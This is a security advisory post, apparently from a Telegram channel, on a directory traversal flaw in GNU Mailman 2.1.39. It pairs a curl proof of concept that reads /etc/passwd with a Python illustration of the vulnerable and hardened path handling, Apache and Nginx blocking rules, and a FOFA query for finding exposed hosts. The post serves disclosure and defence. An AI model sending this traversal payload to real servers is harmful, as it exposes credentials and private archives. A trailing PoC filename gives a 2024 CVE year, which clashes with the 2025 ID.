### 🚨 CVE-2025-43919: Directory Traversal in GNU Mailman 2.1.39 (cPanel/WHM)
> A new vulnerability has been discovered in GNU Mailman 2.1.39, bundled with cPanel/WHM, allowing unauthenticated remote attackers to read arbitrary files on the server via a directory traversal flaw.
📌 **Vulnerability Summary:**
- **Type**: `Directory Traversal` (Unauthenticated)
- **Component**: `private.py` CGI script
- **Affected Endpoint**: `/mailman/private/mailman`
- **Impact**: Disclosure of files such as `/etc/passwd`, private `.mbox` archives, and Mailman configuration files
- **CVSS Score**: `5.8 (Medium)`
- **CVE ID**: `CVE-2025-43919`
- **Status**: No official patch (Mailman 2.1.x is EOL)
🔥 Proof of Concept:
```
curl -X POST -d "username=../../../../etc/passwd&password=x&submit=Let+me+in..." \
http://target/mailman/private/mailman
```
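What the `../` sequences in that request do, shown as an added Python 3 illustration of the bug class. This is not Mailman's own `private.py` (Mailman 2 is Python 2 and its code is not reproduced here); the archive root, the list-name pattern and the function names are assumptions. The vulnerable form joins the request field straight onto the archive directory, so normalisation walks out of the tree; the hardened form allowlists the name and then proves the resolved path still sits under the root.

```python
import os
import re

# Assumed archive root for the illustration; real cPanel/Mailman installs
# use their own configured prefix.
PRIVATE_ARCHIVE_ROOT = "/usr/local/cpanel/3rdparty/mailman/archives/private"

# Assumed allowlist for a list name: lowercase alphanumerics, dot, underscore,
# hyphen; no slashes and no leading dot, so "../" can never pass.
LISTNAME_RE = re.compile(r"^[a-z0-9][a-z0-9._-]*$")


def _archive_root() -> str:
    """Symlink-resolved archive root, so containment checks compare like with like."""
    return os.path.realpath(PRIVATE_ARCHIVE_ROOT)


def vulnerable_archive_path(name: str) -> str:
    """Vulnerable pattern: a request field is joined onto the root unvalidated.

    os.path.join keeps every "../" component and normpath then walks them up
    and out of the archive tree. An absolute name ("/etc/passwd") is worse
    still: join discards the root entirely.
    """
    return os.path.normpath(os.path.join(PRIVATE_ARCHIVE_ROOT, name))


def safe_archive_path(name: str) -> str:
    """Hardened: allowlist the name, then prove the resolved path stays under root.

    The containment check is defence in depth: it still holds if the allowlist
    is later relaxed, and because it compares realpath() results it also
    catches a symlink inside the archive tree that points outside it.
    """
    if not LISTNAME_RE.match(name):
        raise ValueError(f"invalid list name: {name!r}")
    root = _archive_root()
    candidate = os.path.realpath(os.path.join(root, name))
    if os.path.commonpath([root, candidate]) != root:
        raise ValueError(f"path escapes archive root: {candidate}")
    return candidate


def escapes_root(path: str) -> bool:
    """True when the resolved path lies outside the archive root."""
    root = _archive_root()
    return os.path.commonpath([root, os.path.realpath(path)]) != root


if __name__ == "__main__":
    payload = "../../../../etc/passwd"  # the PoC's username value
    resolved = vulnerable_archive_path(payload)
    print("vulnerable ->", resolved, "(escapes root)" if escapes_root(resolved) else "")
    for name in ("announce", payload, "/etc/passwd"):
        try:
            print("safe       ->", safe_archive_path(name))
        except ValueError as exc:
            print("safe       -> rejected:", exc)
```

With the assumed root the PoC's four `../` only climb to `/usr/local/cpanel/etc/passwd`, which is why real payloads stack more of them than they strictly need; `vulnerable_archive_path` accepts any depth, while `safe_archive_path` rejects the name before a path is ever built.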
🧨 Exploitation Scenarios:
- Dump `/etc/passwd`, `configs`, or `mailbox files`
- Leak credentials and sensitive archives
- Chain with other bugs for RCE or escalation
🛡️ Mitigations:
Block access to `/mailman/private` at the web server level. On Apache 2.4 use `Require` on its own; do not pair it with the 2.2-era `Deny from all`, because Apache then either refuses to start (directive unknown without mod_access_compat) or, with mod_access_compat loaded, enforces both rules, so `Deny from all` locks out the loopback address as well:
```
<Location "/mailman/private">
    # Apache 2.4: loopback only, every other client gets 403.
    # Widen to a trusted admin range if private archives must stay reachable.
    Require ip 127.0.0.1
</Location>
```
On Apache 2.2 the equivalent inside the same `<Location>` block is `Order deny,allow`, `Deny from all`, `Allow from 127.0.0.1`. Either way this also cuts off legitimate private-archive readers, so restrict to the addresses that actually need it rather than opening it back up.
Or in Nginx (`return 403` runs in the rewrite phase, before access rules are evaluated, so it alone rejects every client; `deny all` stays as a fallback in case the `return` is removed later):
```
location /mailman/private {
    deny all;       # access-phase block
    return 403;     # rewrite-phase block, answers before deny all is reached
}
```
⬆️ Migrate to **Mailman 3.x**; the 2.x branch is EOL (Python 2 only) and lacks modern protections.
🔍 FOFA Query : [app="Mailman"](https://en.fofa.info/result?qbase64=YXBwPSJNYWlsbWFuIg%3D%3D)
📚 Learn more, share responsibly, and keep your infra secure.
🔒 Follow for more **real-world** CVEs, **PoCs**, and **hardening** tips:
👉 [@cybersecplayground](https://t.me/cybersecplayground)
`#bugbounty` `#infosec` `#exploit` `#pentest` `#cve2025` `#directorytraversal` `#linuxsecurity`
```
[4.0K] /data/pocs/66e720ad17cc14d5b730ec0224cf22e54e8a28d7
├── [1.3K] cve_2024_43919_poc.py
├── [1.1K] LICENSE
└── [1.7K] README.md

0 directories, 3 files
```